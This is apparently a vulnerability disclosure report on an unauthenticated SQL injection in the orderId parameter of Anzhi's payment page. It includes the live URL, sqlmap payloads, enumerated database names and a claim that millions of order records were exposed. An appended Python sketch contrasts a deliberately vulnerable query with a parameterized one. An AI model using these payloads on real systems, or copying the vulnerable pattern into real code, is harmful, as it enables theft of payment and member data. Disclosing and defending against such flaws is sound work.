Anzhi (Beijing Litian Wuxian Network Technology Co., Ltd.) was founded in February 2010 and received an investment in the tens of millions (RMB) from Shanda Networks in June 2011. The Anzhi forum went live in May 2010 and the first version of the Anzhi Market client followed in June, following the forum-first, market-second development model, with each step handled with practiced ease. As of today, Anzhi has become the best-known Android application download platform in China and the first domestic third-party app market to pass ten million users.
SQL injection in Anzhi's core business (affecting more than 4 million order records and all member information)
Seeing that so many folks had submitted vulnerabilities, I couldn't resist looking for some myself. Since there seemed to be relatively few SQL injection reports, I tried hunting for one. After topping up 1 yuan, I found it. One yuan goes a long way, it seems.
No login is required to inject.
Going straight to the injection point. The pay order page, string-type injection in a core parameter:
https://pay.anzhi.com/web/recharge-result?orderId=16032722261270000022
[22:35:53] [INFO] GET parameter 'orderId' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'orderId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 71 HTTP(s) requests:
---
Place: GET
Parameter: orderId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: orderId=16032722261270000022' AND 3359=3359 AND 'kwdp'='kwdp

    Type: UNION query
    Title: MySQL UNION query (NULL) - 23 columns
    Payload: orderId=-3609' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x61784e617a424d615077,0x71707a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
available databases [17]:
[*] accesslog
[*] adunion
[*] adunion_admin
[*] adunion_stat
[*] anzhipay
[*] anzhipay_history
[*] information_schema
[*] keta_custom
[*] mysql
[*] pay
[*] pay_activities
[*] pay_check_bill
[*] performance_schema
[*] quartz
[*] sdk_message
[*] test
[*] ucenter
The pay database:
Database: pay [156 tables]
Then let's see how many orders there are:
4.8 million, almost 5 million.
An SQL injection report should be short and to the point. Yes, that's it.
Solution:
SQL injection; you should know how to fix it.
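As an added illustration that is not part of the original report, the Python sketch below contrasts the query pattern the sqlmap output implies (the orderId value pasted into the SQL text, so a boolean condition appended to it changes the result) with a validated, parameterized lookup. The table and column names, the 20-digit orderId format and the use of an in-memory SQLite database in place of MySQL are all assumptions.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the pay database. Table and column
# names are placeholders; the real schema is not on the page.
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE p_pay_order (order_id TEXT PRIMARY KEY, amount INTEGER, status TEXT)"
)
conn.execute("INSERT INTO p_pay_order VALUES ('16032722261270000022', 100, 'PAID')")
conn.commit()

# Assumption: order ids are 20-digit strings, as in the URL from the report.
ORDER_ID_RE = re.compile(r"[0-9]{20}")


def lookup_vulnerable(order_id: str):
    """The pattern the report implies: the request parameter becomes SQL text.

    A value such as  <id>' AND 1=1 AND 'a'='a  keeps the row, while
    <id>' AND 1=2 AND 'a'='a  drops it, which is exactly the difference a
    boolean-based blind test observes in the page response.
    """
    sql = (
        "SELECT order_id, amount, status FROM p_pay_order "
        f"WHERE order_id = '{order_id}'"
    )
    return conn.execute(sql).fetchall()


def lookup_safe(order_id: str):
    """Hardened form: allowlist the shape, then bind the value as a parameter.

    The driver sends the value separately from the statement, so quotes and
    keywords inside it are never parsed as SQL. With a MySQL driver such as
    PyMySQL the placeholder is %s instead of ?, but the binding is the same.
    """
    if not ORDER_ID_RE.fullmatch(order_id):
        raise ValueError("malformed orderId")
    sql = "SELECT order_id, amount, status FROM p_pay_order WHERE order_id = ?"
    return conn.execute(sql, (order_id,)).fetchall()
```

The rejection of malformed ids should also be logged server-side: a burst of orderId values containing quotes or SQL keywords on the recharge-result endpoint is the detection signal for exactly the scan shown above.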